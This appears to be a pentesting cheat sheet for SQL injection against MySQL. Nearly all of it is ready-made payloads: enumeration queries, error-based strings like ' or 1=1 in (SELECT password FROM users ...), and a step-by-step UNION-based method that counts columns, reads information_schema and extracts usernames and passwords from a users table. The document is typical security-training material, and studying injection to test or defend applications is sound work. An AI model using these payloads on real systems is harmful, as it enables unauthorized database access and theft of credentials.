MYSQL
Authenticated SQLi (Refer here)
SELECT version();
SELECT system_user();
show databases;
SHOW TABLES FROM database_name;
OR
use <db_name>
show tables;
describe users; # describes columns in users' table
SELECT * from <test>.<users>; # here test is DB and the user is a table in test db
SELECT user, authentication_string FROM mysql.user WHERE user = 'test';bashError based SQLi
tom' OR 1=1 -- //
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- // # password for admin userUnion-based SQLi
*** injected UNION query has to include the same number of columns in the original query
*** Data types need to be compatible between each column
1) Finding the number of Columns
' ORDER BY 1-- // # Keep incrementing value of 1 to find columns
2) Finding name, user, and version
%' UNION SELECT database(), user(), @@version, null, null -- // # %' is used for closing the search parameter
# Assume we got 5 columns on step 1, we are using 3 columns and leaving 2 as null here
2.1) Finding name, user, and version
# Sometimes column 1 is reserved for the ID field so no proper value comes and we try this instead
' UNION SELECT null, null, database(), user(), @@version -- //
3) Enumerating table names, column names, and db_name
' UNION SELECT null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
# 1 and 5 are kept null
# we see a table called users, let's dive into that
4) Enumrating few columns from the user table found above
' UNION SELECT null, username, password, description, null FROM users -- //Last updated
Was this helpful?
